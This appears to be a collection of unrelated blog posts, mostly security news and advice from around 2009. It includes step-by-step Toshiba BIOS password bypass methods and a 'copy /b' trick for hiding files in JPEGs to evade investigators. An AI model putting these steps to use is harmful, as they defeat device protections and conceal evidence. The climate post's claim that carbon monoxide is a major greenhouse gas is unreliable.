• Go to the site yourself, rather than clicking on links in suspicious emails. If you receive a communication asking for sensitive information but think it could be legitimate, open a new browser window and go to the organization’s website as you normally would (for instance, by using a bookmark or by typing out the address of the organization’s website). This will improve the chances that you’re dealing with the organization’s website rather than with a phisher’s website, and if there’s actually something you need to do, there will usually be a notification on the site. Also, if you’re not sure about a request you’ve received, don’t be afraid to contact the organization directly to ask. It takes just a few minutes to go to the organization’s website, find an email address or phone number for customer support, and reach out to confirm whether the request is legitimate.

• If you’re on a site that’s asking you to enter sensitive information, check for signs of anything suspicious. If you’re on a site that’s asking for sensitive information — no matter how you got there — check for the signs that it’s really the official website for the organization. For example, check the URL to make sure the page is actually part of the organization’s website, and not a fraudulent page on a different domain (such as mybankk.com or g00gle.com.) If you’re on a page that should be secured (like one asking you to enter in your credit card information) look for “https” at the beginning of the URL and the padlock icon in the browser. (In Firefox and Internet Explorer 6, the padlock appears in the bottom right-hand corner, while in Internet Explorer 7 the padlock appears on the right-hand side of the address bar.) These signs aren’t infallible, but they’re a good place to start.

• Be wary of the “fabulous offers” and “fantastic prizes” that you’ll sometimes come across on the web. If something seems too good to be true, it probably is, and it could be a phisher trying to steal your information. Whenever you come across an offer online that requires you to share personal or other sensitive information to take advantage of it, be sure to ask lots of questions and check the site asking for your information for signs of anything suspicious.

• Use a browser that has a phishing filter. The latest versions of most browsers — including Firefox, Internet Explorer, and Opera — include phishing filters that can help you spot potential phishing attacks.

All fairly simple, right? What it all comes down to is if someone asks you to share personal or other sensitive information online, take a moment to think through the request carefully. Doing so will help you stay safe online, and help us all put phishers out of business.

Creating a new password is often one of the first recommendations you hear when trouble occurs. Even a great password can’t keep you from being scammed, but setting one that’s memorable for you and that’s hard for others to guess is a smart security practice since weak passwords can be easily guessed. Below are a few common problems we’ve seen in the past and suggestions for making your passwords stronger.

Problem 1: Re-using passwords across websites
With a constantly growing list of services that require a password (email, online banking, social networking, and shopping websites — just to name a few), it’s no wonder that many people simply use the same password across a variety of accounts. This is risky: if someone figures out your password for one service, that person could potentially gain access to your private email, address information, and even your money.

Solution 1: Use unique passwords
It’s a good idea to use unique passwords for your accounts, expecially important accounts like email and online banking. When you create a password for a site, you might think of a phrase you associate with the site and use an abbreviation or variation of that phrase as your password — just don’t use the actual words of the site. If it’s a long phrase, you can take the first letter of each word. To make this word or phrase more secure, try making some letters uppercase, and swap out some letters with numbers or symbols. As an example, the phrase for your banking website could be “How much money do I have?” and the password could be “#m$d1H4ve?” (Note: since we’re using them here, please don’t adopt any of the example passwords in this post for yourself.)

Problem 2: Using common passwords or words found in the dictionary
Common passwords include simple words or phrases like “password” or “letmein,” keyboard patterns such as “qwerty” or “qazwsx,” or sequential patterns such as “abcd1234.” Using a simple password or any word you can find in the dictionary makes it easier for a would-be hijacker to gain access to your personal information.

Solution 2: Use a password with a mix of letters, numbers, and symbols
There are only 26^8 possible permutations for an 8-character password that uses just lowercase letters, while there are 94^8 possible permutations for an 8-character password that uses a combination of mixed-case letters, numbers, and symbols. That’s over 6 quadrillion more possible variations for a mixed password, which makes it that much harder for anyone to guess or crack.

Solution 3: Create a password that’s hard for others to guess
Choose a combination of letters, numbers, or symbols to create a unique password that’s unrelated to your personal information. Or, select a random word or phrase, and insert letters and numbers into the beginning, middle, and end to make it extra difficult to guess (such as “sPo0kyh@ll0w3En”).

Problem 4: Writing down your password and storing it in an unsecured place
Some of us have enough online accounts that we may need to write our passwords down somewhere, at least until we’ve learned them well.

Solution 4: Keep your password reminders in a secret place that isn’t easily visible
Don’t leave notes with your passwords to various sites on your computer or desk. People who walk by can easily steal this information and use it to compromise your account. Also, if you decide to save your passwords in a file on your computer, create a unique name for the file so people don’t know what’s inside. Avoid naming the file “my passwords” or something else obvious.

Problem 5: Recalling your password
When choosing smart passwords like these, it can often be more difficult to remember your password when you try to sign in to a site you haven’t visited in a while. To get around this problem, many websites will offer you the option to either send a password-reset link to your email address or answer a security question.

Solution 5: Make sure your password recovery options are up-to-date and secure
You should always make sure you have an up-to-date email address on file for each account you have, so that if you need to send a password reset email it goes to the right place.

Many websites will ask you to choose a question to verify your identity if you ever forget your password. If you’re able to create your own question, try to come up with a question that has an answer only you would know. The answer shouldn’t be something that someone can guess by scanning information you’ve posted online in social networking profiles, blogs, and other places.

If you’re asked to choose a question from a list of options, such as the city where you were born, you should be aware that these questions are likely to be less secure. Try to find a way to make your answer unique — you can do this by using some of the tips above, or by creating a convention where you always add a symbol after the 2nd character in the answer (e.g. in@dianapolis) — so that even if someone guesses the answer, they won’t know how to enter it properly.

IT departments are fighting the security battles of five or 10 years ago, unaware that their IT systems are dangerously exposed to computer hackers.

That was the message from a study published this week by the US security education and research body the Sans Institute and security suppliers Tippingpoint and Qualys.

The study is the first to analyse systemically how cybercriminals are breaking into corporate IT systems. It draws on attack patterns recorded by intrusion detection systems in 6,000 organisations and software vulnerabilities detected in a further 9,000 firms.

Its findings will lead to a widespread reassessment of how companies spend their IT security budget, says Allen Paller, director of research at the Sans Institute.

Fundamental error

The study shows that chief security officers are spending most of their budgets ensuring that the operating systems of their PCs and servers are patched. But many hackers are directing their attacks against vulnerabilities in web applications and common desktop software, bypassing the operating system entirely.

Vulnerabilities in commonly used desktop software programs, including Adobe PDF, QuickTime, Adobe Flash and Microsoft Office, and in web applications accounted for 60% of hacking attacks recorded over the past five months.

“IT departments are still celebrating their success at patching operating systems. They think they are doing great, but they are using the wrong metrics,” says Rob Lee, faculty leader in forensics at the Sans Institute.

The greatest risk to corporate IT systems, comes form hackers exploiting vulnerabilities in popular websites to plant and spread malicious code on a huge scale.

Employees feel safe visiting trusted sites from their work places, but they are easily fooled into opening documents, music and video files that contain malicious code.

Once downloaded, the code exploits vulnerabilities in unpatched applications on their desktops, allowing hackers to plant backdoors that can provide them access to corporate networks.

Spear phishing

Hackers are using another technique known as spear phishing – targeted e-mails containing malware – to exploit the same application vulnerabilities.

Over the past year, the Sans team has responded to 40 major security incidents in businesses and government departments. Two-thirds have been spear phishing attacks.

“We have recently seen financial attackers using spear phishing campaigns against chief financial officers to get them to click on a link. They install a key logger. Once an individual logs into the bank account, the hackers get in and start moving funds,” says Lee.

There are some straightforward measures that business can take to protect themselves, says the Sans Institute.

Small businesses can deploy a separate hardened PC for staff to use for financial transactions online. And for all companies, deploying a web application firewall will help to protect web applications from malicious attacks.

“For the client side, get code patched and get it patched more quickly. The idea that you can patch operating systems in a week is great news. But that is focusing on the attacks of a couple of years ago,” says Ed Skoudis, security consultant at the Internet Storm Centre, which monitors hacking activity.

The other point, he says, is that companies should redouble their efforts to make sure users do not log into their machines with administrator privileges. “That way, if there is some sort of exploit, and the bad guys get a toe hold, it is only with limited privileges,” he says.

SQL injection attacks

SQL injection is the most common technique used by hackers to compromise web applications. The technique can be blocked by careful coding, but the Sans Institute warns that some programmers are creating applications that use SQL injection, leaving their networks open to attack from hackers.

“People writing these applications do not realise that they have put SQL injection in code as a feature. We find a lot of these applications in company networks. Things that people have put together quickly,” says Rohit Dhamankar director of security research at Tippingpoint.

Websense revealed the findings from its bi-annual research report. Its security labs identified a 233 percent growth in the number of malicious sites in the last six months and 671 percent growth in the number of malicious sites during the last year.

In the first half of 2009, 77 percent of Web sites with malicious code are legitimate sites that have been compromised. This high percentage was maintained over the past six months due in part to widespread attacks including Gumblar, Beladen and Nine Ball which aimed to compromise trusted and known Web properties with massive injection campaigns.

Efforts to self police Web 2.0 properties have been largely ineffective. Websense research shows that community-driven security tools used on sites like YouTube and BlogSpot are 65 percent to 75 percent ineffective in protecting Web users from objectionable content and security risks.

The “dirty” Web is getting dirtier: 69 percent of all Web pages with content classified as objectionable also had at least one malicious link. This is becoming even more pervasive, as 78 percent of new Web pages discovered in the first half of 2009 with objectionable content had at least one malicious link.

The Web continues to be the most popular vector for data-stealing attacks. In the first half of 2009, 57 percent of data-stealing attacks are conducted over the Web. 37 percent of malicious Web attacks included data-stealing code, demonstrating that attackers are after essential information and data.

The convergence of blended Web and email threats continues to increase. Websense reports that 85.6 percent of all unwanted emails in circulation during this period contained links to spam sites and/or malicious Web sites. In June alone, the total number of emails detected as containing viruses increased 600 percent over the previous month.

Method 1. Printer Dongle Method:

Works with Portege, Satellite, Satellite Pro, Tecra and Libretto Laptops of the following model numbers :

100(1xx) 200(2xx) 300(3xx) 400(4xx) 500(5xx) 600(6xx) 700(7xx)
1000(1xxx) 2000(2xxx) 3000(3xxx) 4000(4xxx) 7000(7xxx) 8000(8xxx)
(A15-S 127) (1415-S 173) SERIES & Some DVD Models
The “xxx” above means that each x can be any number, i.e. 1xx could be 101, 103, 111, 112 etc.

* First cut a plug from an old DB25 printer cable, and open the casing of the plug. This is how the pins look: (Image 1)

* Now connect: (image 2)
o Pin 1 to Pin 5 and to Pin 10 ( go from 1 to 5 and from 5 to 10)
o Pin 2 to 11
o Pin 3 to 17
o Pin 4 to 12
o Pin 6 to 16
o Pin 7 to 13
o Pin 8 to 14
o Pin 9 to 15
o Pin 18 to 25

It should look something like this: (image 3,4)

Plug it in and bootup

METHOD 2. Shorting a jumper:

(image 5)

In order to clear a BIOS of Compal manufactured units you need to use the NO POWER method, units manufactured by Inventec need to be to be POWERED ON to rest the BIOS.

To reset Compal units:

1. Turn off the POWER
2. Remove the battery and power cord
3. Peel back any black mylar (if any) covering the jumper
4. Using a flat screwdriver, short the jumper by connecting the two jumper points
5. Reset the computer and verify the BIOS has been reset, if not then repeat steps

Inventec units can skip steps 1 and 2

METHOD 3. Challenge/Response Code:

(image 6)

The challenge/response code method consists of matching a Challenge code ( power the machine up,press ctrl,then tab,then ctrl, then enter) generated on your machine and matching a Response code generated by Toshiba and calling a Toshiba Tech Support Agent.

A strong password should be two things: easily recalled by its owner and difficult to guess by someone who doesn’t know it. So even non-hackers can guess a few on the worst list.

“123456? is number one followed by you guessed it, “password.” Some on the list are intriguing. Number 496 is a “mistress” although I don’t know if the owners lean toward kept women or men who wished they had one. Many are profane with a hint of anger and impulsiveness suggesting people don’t want to bother with passwords. Some are plays on words like “letmein.” Number 486 is a seemingly cryptic letter string “abgrtyu” and still made the list.

The list comes from the book “Perfect Password: Selecttion, Protection, Authentication” published in 2005. While the list would appear outdated, it still gets considerable attention because it’s unique.

One out of nine passwords used is on the list and about 50% of passwords are “based on names of a family member, spouse, partner, or a pet,” according to the book’s teaser on Amazon. Just ask Sarah Palin whose email was hacked last September by someone who reset her password using her zipcode, birthdate and where she met her spouse. When asked where she went to high school, the hacker entered  “Wasilla High” and was right. Such is the price of celebrity and people knowing a lot about you.

Passwords are a challenge. Like you, I often want quick access to a site and view the password as an obstacle deserving little attention. However, I can proudly say no password I have ever used is on the worst list.

In a recent discussion with fellow bloggers, one said he keeps passwords only in his head. He never writes them down ANYWHERE. I have far too many for that and lack the photographic mind he must have. He also avoids passwords hints such as a boyhood dog or mother’s maiden name given what happened to Palin.

Another swears by password manager Roboform which can be downloaded for $35. I may try this given good reviews and because I don’t feel secure with my current password strategy if you can call it that. I am constantly looking them up and must have about 30 of them. I also have used meebowith some success as a single logon/password to multiple instant messaging accounts. I tried something called a secure login named vidoop, but it was too good: it didn’t let me into anything.

There’s plenty of advice on how to create a good password such as Microsoft’s six-steps to creating “a strong, memorable password. Some of the advice is obvious, but worth repeating.

– Use a mix of symbols, characters and numbers. Use spaces if allowed.

– If you can’t use symbols, double the number of characters.

– Think of a memorable sentence and take the first letter of each word and combine into a password.

– Use a password checker to test its strength.

Advertising, marketing and promoting company uSocial (usocial.net) said it was targeting social networking sites because of their huge advertising potential.

“Facebook is an extremely effective marketing tool,” Leon Hill, uSocial CEO, said in a statement.

“The simple fact is that with a large following on Facebook, you have an instant and targeted group of people you can contact and promote whatever it is you want to promote,” he added.

“The only problem is that it can be extremely difficult to achieve such a following, which is where we come in.

The company offers packages for Facebook, the world’s number one social networking site, that start at 1,000 friends up to 10,000 friends at costs ranging from $177 to $1,167.

Facebook is now the world’s fourth-most visited website.

The company, which counts venture capitalist Peter Thiel, Accel Partners, Microsoft Corp and Russian Internet investment firm Digital Sky Technologies among its investors, has more than 250 million registered users.

But uSocial’s packages are not without controversy. According to some Australian websites, Twitter tried to shut uSocial down, accusing it of spamming members, while the Los Angeles Times reported that Digg.com, a website where people vote for their top news stories or websites, has also tried to shut down uSocial because it sells votes.

Mid Day, Delhi

2009-08-20

Online job frauds just got bigger, smarter and more authentic.

A new batch of fake job offer letter emails specifically targets young IT professionals, and is being circulated by scamsters posing as HCL and Wipro employees.

The emails, promising job-seekers interview calls from these two IT giants, carry seemingly authentic employee codes, hologram of the companies and even the designation of the persons who have sent the letters.

The mails direct interested employees to deposit a nominal fee as ‘refundable interview security’ in a specific bank and also include the account number to make it look real.

Be warned: The advisory against fake job offers posted by HCL on its website.

Mail order

The email being circulated offering jobs at HCL, a copy of which is with MiD DAY, comes with the subject: “HCL Direct Recruitments Offer.” It reads, “The company has selected 32 candidates’ list for IT, Administration and Production departments, as well as is offering you to join as an executive/manager post in respective department.”

The email carries the contact details of two people K Rangnathan and Vikas Mehta who mention the mail is ‘confidential’ and is being sent to ‘candidates chosen from a well-known job portal’. The mail also mentions the two are part of the ‘HCL Human Resource Department’ and includes an employee code ID-11538 as well. “We are sending this mail on behalf of the IT company,” the letter adds.

The email asks professionals to deposit Rs 5,250 (in cash) as ‘refundable security’ in favour of the company’s senior Human Resource Department official Ajay Kumar Jha at any branch of the Punjab National Bank. The account number mentioned is 7200002466100.

It instructs job seekers to inform the department about the payment made by writing in at hcl.appointment@dr.com

The mail says after the fee has been deposited, the applicant will receive an offer letter with air tickets for the final interview at the HCL headquarters in Noida on August 24.

The alleged mail from Wipro says, “Wipro has 45 job vacancies in its facilities in Delhi, Bangalore, Noida and Pune.” This mail too includes similar cash deposit instructions. It also promises to repay expenditures the candidate incurs during the direct interview with company officials.

Almost real

Cyber security experts are alarmed at this smart duplicity. They point out that fraudsters have created a database and are selectively targeting a specific audience, in this case, software engineers.

“Scamsters are cashing in on the economic slowdown. But they have become smarter. These mails are so authentic it is hard to make out they are fake.”

Worried firms

While the emails fool youngsters, the companies being framed are worried as well. The two IT firms have strongly condemned the mails. A senior HR official from HCL confirmed they have received complaints and queries about fake job offers. “Criminals are tarnishing our image even though the company has no role in it. We welcome people to approach us to complain against such nuisances. We take such matters very seriously and are working with the police to curb such malpractices,” said the official.

A vice-president of Wipro’s Talent Acquisition department, said, “Wipro advertises job openings on its career website, on registered job portals, staffing partners and through media advertisements.

The advertisements carry the Wipro logo and the Wipro email ID.”

Even HCL has posted an advisory warning against fake job offers on its official website. The advisory says, “It has been found that unscrupulous individuals/ placement agencies have been enticing candidates with job opportunity at HCL. HCL wishes to state that the company has never charged money for recruiting candidate nor does the company have authorised agency or firm for recruiting candidate.”

According to German media reports, a popular computer magazine is on sale in the country containing a copy of the W32/Induc-A Delphi virus on its free cover CD ROM.

The 18/2009 edition of ComputerBild, one of Germany’s biggest computer magazines with an estimated readership of over 4 million people, carries an infected copy of TidyFavorites 4.1, a tool used to help you organise your browser’s list of favourite websites, on its cover CD.

Springer-Verlag, the publishers of ComputerBild, have reportedly contacted independent experts at AV-Test.org who have confirmed the infection.

ComputerBild has published a statement to its readers (in German), warning of the infection and providing a link to a clean, uninfected version of the program.

The good news is that W32/Induc-A appears to be a proof-of-concept virus and has no malicious payload other than spreading – nevertheless, no-one wants unauthorised hacker’s code running on their computer.

• A free web based geoportal with medium to high resolution Indian Remote Sensing (IRS) satellite imagery superimposed over entire India on 3D globe.
• Bhuvan Plug-in is needed to use the application and the same can be downloaded from the Bhuvan website.
• Bandwidth-friendly.
• Following data is available on Bhuvan.
  • Satellite imagery (LISS III , LISS IV along with metadata and Multi- temporal Data from OCM & AWiFS).
  • Value added information (NADAMS – National Agricultural Drought Monitoring System), Output of flood studies for certain areas.
  • Thematic information (Wastelands,Soils,watershed,water resources related maps).
  • Base layers (administrative boundaries,transport layers,water bodies, etc).
  • Census information.
  • Metadata.
• Limitations:
  • To download plug in, registration is necessary.
  • Does not display data in real-time.
  • In the current version, adding personalized data is not possible.
  • Runs only on windows system and is optimized for IE 6 or higher.

View an interesting video clip: ISRO launches ‘Bhuvan’ desi version of Google Earth

Read more from Press Information Bureau.

For more details, log on to Bhuvan.

Effects of Global Warming

Phew it’s been a long and hot day. The days are getting hotter and hotter.

We are living in a world where we are experiencing Global Warming. A short def on what is Global Warming? Global Warming refers to an average increase in the Earth’s Temp. Which in turn causes changes in climate? A warmer earth will lead to changes in rainfall pattern, a rise in sea level and a wide range of impacts of plants, wildlife and humans.

Now coming to the Effects of Global Warming?

The concentration of GHGs i.e. Greenhouse Gases such as methane and carbon monoxide in the atmosphere are a result of the fossil fuels that we use to do things in our daily lives.  In generating electricity, fuel to run our cars, production of consumer goods and also large amounts of carbon monoxide is exhibited from airplanes.

The current concentrations are about 380 parts per million.

We keep saying it’s getting warmer, it’s getting warmer. How much warmer is it?

According to the study of scientist globally the mercury is already up more than 1 degree Fahrenheit.  It may sound less to us just a degree but every degree makes a difference in our world, in our life. .

When will the climate change occur?                                                                                                                       The effects of rising temp aren’t waiting, they’re happening right now. It is not going to wait for anyone but continue to harm the world we are living in. It will harm the wildlife in the world as well.

What wildlife will be affected?

The wildlife that are being affected due to Global Warming are: Caribou, Arctic foxes, Toads, Polar Bears, Penguins, Gray Wolves, Tree swallows, Painted Turtles and Salmon are the few to name who are being affected.

Global Warming is having a grave impact in the world due to increase in temp.      Some impacts from increasing temp are:

1.Ice is melting esp. at the earth’s pole thus making it difficult for animals living in these regions like the penguins.                                                                       2. Sea level is rising thus causing floods and high tides.                                              3. Precipitation has increased across the globe.

Signs are everywhere:

1. Glaciers are melting.
2. The sea levels are increasing thus causing floods.
3. Deforestation.

There are so many…countless.

How much more are we to experience before we get realize and start doing something.

What can we do?                                                                                                                       1. Switch to renewable energy.                                                                                                                                         2. Using energy smart appliances.                                                                                        3. Only turning on lights when you are using them.                                                                                                                                              4. Closing the tap when while you are brushing your teeth.                                                                                                                                                5. Driving less, do more car pools.                                                                                                                                              6. No use of plastic.                                                                                                                                              7. Go environment friendly.

Tomorrow’s climate is today’s challenge so take up the challenge and do something for your environment by following some of the points to help in stopping Global Warming.

Why is there a dead pakistani on my couch?

Makes you wonder why google thinks its so, try it, you wont believe it!

If your customers think that you tried to spy on them, that’s not going to be good for business.

23 July 2009

http://www.sophos.com/blogs/gc/g/2009/07/23/blackberry-customers-revolt-after-spyware-scandal/

That’s the message that’s presumably being heard loud-and-clear by telecoms company Etisalat, which has found itself in the middle of a storm of negative headlines after it was revealed that an update it sent to BlackBerry users in the United Arab Emirates, which claimed to improve performance of the mobile device, was actually spying on them.

RIM, makers of the Blackberry smartphone beloved by businesspeople around the world, say that the spyware update sent out by Etisalat actually worsened battery life and reception, and (most worryingly) was designed to “to send received messages back to a central server.”

Potentially, the patch gave Etisalat the ability to read any emails and text messages sent from their customers’ BlackBerry devices.

Now, an online survey conducted by the Arabian Business website reveals that more than 50% of Etisalat’s BlackBerry customers are planning to ditch the UAE telecoms provider in the wake of the spyware. It’s hard not to feel sympathetic with those aggrieved customers. After all, as Erin Andrews just demonstrated, no-one likes to be watched without their knowledge.

Curiously, the offending patch appears to have been written by a US-based company called SS8, who develop electronic surveillance solutions for intelligence agencies.

Quite why Etisalat may have wanted to distribute a spyware update to monitor its customers is still unclear. So far they have declined to comment on the claims of spyware, restricting their public comment on the matter to the following statement:

Etisalat today confirmed that a conflict in the settings in some BlackBerry devices has led to a slight technical fault while upgrading the software of these devices.

This has resulted in reduced battery life in a very limited number of devices. Etisalat has received approximately 300 complaints to date, out of its total customer base which exceeds 145,000.

These upgrades were required for service enhancements particularly for issues identified related to the handover between 2G to 3G network coverage areas.

Customers who have been affected are advised to call 101 where they will be given instructions on how to restore their handset to its original state. This will resolve the issue completely.

RIM has published an update which removes the application from affected BlackBerry smartphones.

http://news.sky.com/skynews/Home/UK-News/Sky-News-Undercover-Laptop-Investigation-Repair-Shops-Caught-Hacking-Into-Personal-Files/Article/200907315343387?lpos=UK_News_Top_Stories_Header_0&lid=ARTICLE_15343387_Sky_News_Undercover_Laptop_Investigation%3A_R

Some computer repair shops are illegally accessing personal data on customers’ hard drives – and even trying to hack their bank accounts, a Sky News investigation has found.

In one case, passwords, log-in details and holiday photographs were all copied onto a portable memory stick by a technician.

In other shops, customers were charged for non-existent work and simple faults were misdiagnosed.

An investigator from the Trading Standards Institute said he was “shocked” by the findings.

The investigation was carried out using surveillance software loaded onto a brand-new laptop.

It operated without the user being aware that every event that took place on the computer was being logged.

All activity on the screen was captured in still images, and the identity of whoever was using the computer was recorded using the laptop’s built-in camera.

Sky engineers then created a simple, easily diagnosable fault, by loosening the connection of the internal memory chip.

This prevented Windows being able to load. To get things working again, the chip would simply need to be pushed back into position.

The investigation targeted six different computer repair shops. All but one misdiagnosed or overcharged for the fault.

The most serious offender was Revival Computers in Hammersmith, West London.

Shortly after identifying the real fault, an engineer called our undercover reporter to say the computer needed a new motherboard, which would cost £130.

Tests carried out by our internal Sky engineer after the diagnosis revealed there was nothing wrong with it.

The surveillance software then recorded one technician browsing through the files on the hard-drive, including private documents and intimate holiday photos, including some of our researcher in her bikini.

As he snooped through the files, he is seen smiling and showing the pictures to another colleague.

Later on in the same shop, a second technician loads up the machine and also looks through the photos, which are inside a folder clearly marked ‘private’.

He then plugs his own portable memory stick into the laptop and copies files, including passwords and photos, into a folder labelled “mamma jammas”.

Inside one of the documents copied to the memory stick was a text file containing passwords for Facebook, Hotmail, eBay and a NatWest bank account.

Once the technician had discovered this information, he opened a web browser on the laptop and attempted to log into the back account for around five minutes.

The only reason he was unsuccessful was because the details were fake.

When confronted over the findings, staff at Laptop Revival said they did not want to respond to Sky News on camera.

However in a telephone conversation, they denied all knowledge of the alleged abuses.

When shown the findings, Richard Webb, an e-commerce investigator for Trading Standards said: “I’m really quite shocked, both in the range of potential problems this has revealed – people overcharging, mis-describing the faults – but also people attempting to steal personal details.

“It’s a big abuse of trust. If you were expert in computers you wouldn’t have to hand in your machine to be repaired. They know that.

“They know you won’t be able to tell what they’ve done afterwards, they know you’re putting your trust in them and unfortunately, as we’re seeing, there are too many people willing to abuse that trust.

“What you’ve shown is that there is a much wider problem in the industry than we knew about.

“It suggests we need to look at the area again and we do need to test it like you have done, but with a view of taking criminal enforcement action if these problems are found and evidenced.”

By Robert Lemos

July 08, 2009

http://www.technologyreview.com/computing/22966/

Barnaby Jack, a security researcher at the computer networking giant Juniper, had planned to hack into an automatic teller machine (ATM) live onstage at the Black Hat Security Conference in Las Vegas later this month. But his presentation, designed to demonstrate the insecurity of various ATMs, attracted the attention of the financial industry as well as security professionals, and under pressure from ATM manufacturers, Juniper canceled the presentation last week, citing concerns that the vulnerabilities involved had still not been fixed.

“The vulnerability Barnaby was to discuss has far reaching consequences, not only to the affected ATM vendor, but to other ATM vendors and–ultimately–the public,” wrote Brendan Lewis, director of corporate social media relations for Juniper in a statement posted to the company’s official blog last week. “To publicly disclose the research findings before the affected vendor could properly mitigate the exposure would have potentially placed their customers at risk. That is something we don’t want to see happen.”

The presentation would have focused on exploiting vulnerabilities in devices running the Windows CE operating system, including some ATMs, according to a source familiar with the details. While the presentation was canceled to allow manufacturers more time to fix the vulnerabilities, Juniper had originally notified the company almost eight months ago, says the source, who asked not to be named.

Other security experts are not surprised that the vulnerabilities are there to find. Significant flaws in cash machines and ATM networks are plentiful, says Nicholas Percoco, senior vice president of TrustWave, an information security and compliance firm that has assessed the security of point-of-sale terminals, kiosks, and ATM networks. “It is very, very rare that a device comes to our labs–in fact, I don’t think that it has happened–that we don’t find a vulnerability,” Percoco says.

http://www.spamfighter.com/News-12663-Indian-Orkut-Accounts-Compromised-For-Phishing.htm

According to McAfee Avert Labs, as Web 2.0-based social networking sites such as Facebook and MySpace increase in popularity, their users too are increasingly proving as convenient attack points for identity scams and other online frauds. Recently, hackers, online scammers and other cyber-criminals have been using Twitter as well to phish off private data from Web surfers.

Aside these websites, another social networking site that cyber-criminals prefer to use is Orkut, which probably represents the most widely visited and popular social networking site across the Indian sub-continent. As a matter of fact, reports state that over 15% of Orkut traffic flows from India.

Consequently, phishers have devised a stylish approach i.e. in light of a huge population of Indian users favoring Orkut but being insufficiently tech-savvy, phishers and other online scammers have secured control over their accounts through the act of hijacking the Orkut networking accounts of these India-based users.

Seemingly, phishers have modified these accounts’ user profiles, connecting them to their different fraudulent (phishing) websites that entice users into revealing their private details.

For instance, these phishing sites could pretend to be Orkut in its adult version. Meanwhile, it is reported that the fake Orkut website on sex-related content named “Orkut Sex” has met with ongoing success in enticing numerous Orkut members into feeding personal user identifications into the bogus site. Accordingly, when these identification details come into the hands of scammers, the latter use them to harvest other private details of the users and subsequently make illegal money transfers.

McAfee Avert Labs, meanwhile, has observed an array of phishing sites related to Orkut namely http://orkutst[blocked].tk, http://orkutsexlogi[blocked].tk, http://priya[blocked].freehostia.com, http://s3x[blocked].kilu.de and http://album[blocked].kilu.de.

Thus, security experts at McAfee once again repeat for end-users that they mustn’t disclose their monetary or any other personal information online, especially on websites such as Orkut. They also reiterate that users must ensure for all protective measures, in place, on their computers, while avoiding all forms of phishing sites.

Moreover, users on Orkut, MySpace, Facebook and other social networking sites must make themselves aware of the botherations they might encounter if a malicious spam or phishing attack chases them.

Will post pictures soon, that is the moment my phone gets a good enuf signal to send the photos by mail.

As for the flight, full of surprises.

Met a guy by the name Rohit Kalia. Nice guy, going to muscat for work. Right after clearing immigration, we both were seperately picked from the line and asked to wait as we both had apparently paid for extra luggage.

Thereafter we were taken seperately and asked why are we doing so. I dont get the point that if we paid for the luggage, why should they be bothered about why we are taking the luggage.

The check in to the Intl Airport was the highlight if the trip. Absolutely no security check for the luggage, which went straight to the check in! The only time i got checked for bagagge is the counter between the gate and immigration!

And to add to the fun part, according to the X-Ray machine, my toothbrush looked like a knife. They X-Rayed it seperately!

Well, thanx to my new friend, I did not get bored during the 3 hour wait at delhi airport. And now thanx to Wi-Fi, i dont think, I will get bored here.

I am finally leaving Delhi for a job abroad, which shall be a great new life for me.

As I leave, I can only look back at some of the exciting things that happened past 4 years.

For the moment, this is all that I shall be writing, as i get to the airport, if I am able to get net there, then you will see much more…

At work: You get fired for watching TV and playing games.
In prison: You get your own toilet.
At work: You have to share.
In prison: They allow your family and friends to visit.
At work: You cannot even speak to your family and friends.
In prison: All expenses are paid by taxpayers with no work required.
At work: You get to pay all the expenses to go to work and then they deduct taxes from you salary to pay for prisoners.
In prison: You spend most of your life looking through bars from inside wanting to get out.
At work: You spend most of your time wanting to get out and go inside bars.
In prison: There are wardens who are often sadistic.
At work: They are called supervisors.
In prison: You have unlimited time to read e-mail jokes.
At work: You get fired if you get caught.

Cho Moon-hwan, a South Korean three-cushion master has taken the difficult game to another level by recreating spinning cue ball shots without using a cue. He says he developed the technique 20 years ago while working at his cousin’s billiard room, during his free time.

The 40-year-old was South Korea’s billiards representative in the 1998 Bangkok Asian Games.

Three-cushion billiards games are played on a large, pocket-less table with three balls which are bigger than regular pool balls. The player’s ball needs to hit the other two balls and at least three rails in a single stroke to score one point. Cho says he can now do more than 50 billiard shots with his hand and is developing more.

While the claim was never proved, it is very easy to hide [or embed] any other file[s] inside a JPEG image. You can place video clips, pdf, mp3, Office documents, zipped files, webpage or any other file format inside a JPEG image.

And when a suspecting user [read CIA, FBI] tries to open that jpeg file [with concealed information] in either a photo editing software or as a thumbnail inside Windows Explorer, it would be tough to make out if this camouflaged jpg file is different from any standard jpg image.

Let’s say you want to hide a confidential PDF document from the tax investigation officers. What you can do is convert that file into a regular jpg image so even if anyone double-clicks this file, all he will see is a preview of the image and nothing else. And when you want to work on the actual PDF, just rename the extension from jpg to pdf.

Here’s the full trick:

Step 1: You will need two files – the file you want to hide and one jpg image – it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]

Step 2: Copy the above two files to the C: folder and open the command prompt window.

Step 3: Move to the c: root by typing cd \ [if the files are in another folder, you'll have to change the prompt to that folder]

Step 4: The most important step – type the following command:

copy /b myimage.jpg + filetohide.pdf my_new_image.jpg

To recover the original PDF file, just rename my_new_image.jpg to filename.pdf.

Here we illustrated with an pdf file as that works with simple renaming. If you want to apply this technique to other file formats like XLS, DOC, PPT, AVI, WMV, WAV, SWF, etc, you may have to first compress them in RAR format before executing the copy /b DOS command.

To restore the original file, rename the .jpg file to .rar and extract it using 7-zip or Winrar.

Please Note: I am not responsible for Any misuse of the information provided on this blog. This is for informational purposes only, do not be stupid!

A: Stop calling them netbooks.

That’s the bizarre advice from Microsoft, suggested by one corporate overlord at this week’s Computex trade show in Taipei.

His beef? The term “netbook” implies a notebook that is useful only for surfing the net, but since today’s mini-notebooks do so much more than just that, the term should be retired.

His suggestion for replacing the term? The exquisitely Microsoftian “low cost small notebook PC.”

Semantics in this space are getting increasingly complicated, though whether you call them netbooks, mini-notebooks, smartbooks, or, ahem, low cost small notebook PC, most of these machines do pretty much the same stuff. (The only real difference in this group is the smartbook, a term which is now being used to describe a notebook-type machine that runs a smart phone operating system like Android or, someday, the iPhone OS.)

But Microsoft is doing everything in its power to move the market away from $400 netbooks and toward $1000-plus traditional laptops. Windows 7 Starter Edition, the egregiously stripped-down version of the company’s upcoming OS, will be so severely hamstrung that Microsoft has offered the stated goal of encouraging users to upgrade to a more premium version of Windows 7.

The etymological approach is another step in that direction, I suppose, a subtle jab that your computer isn’t powerful enough. The term “netbook” sounds kinda cool. “Low cost small notebook PC” sounds like something designed for a child.

As with many of Microsoft’s great ideas, my hunch is that manufacturers will nod enthusiastically at the suggestion… and summarily ignore it.

Viva la netbook!

Try this: Take a photo and upload it to Facebook, then after a day or so, note what the URL to the picture is (the actual photo, not the page on which the photo resides), and then delete it. Come back a month later and see if the link works. Chances are: It will.

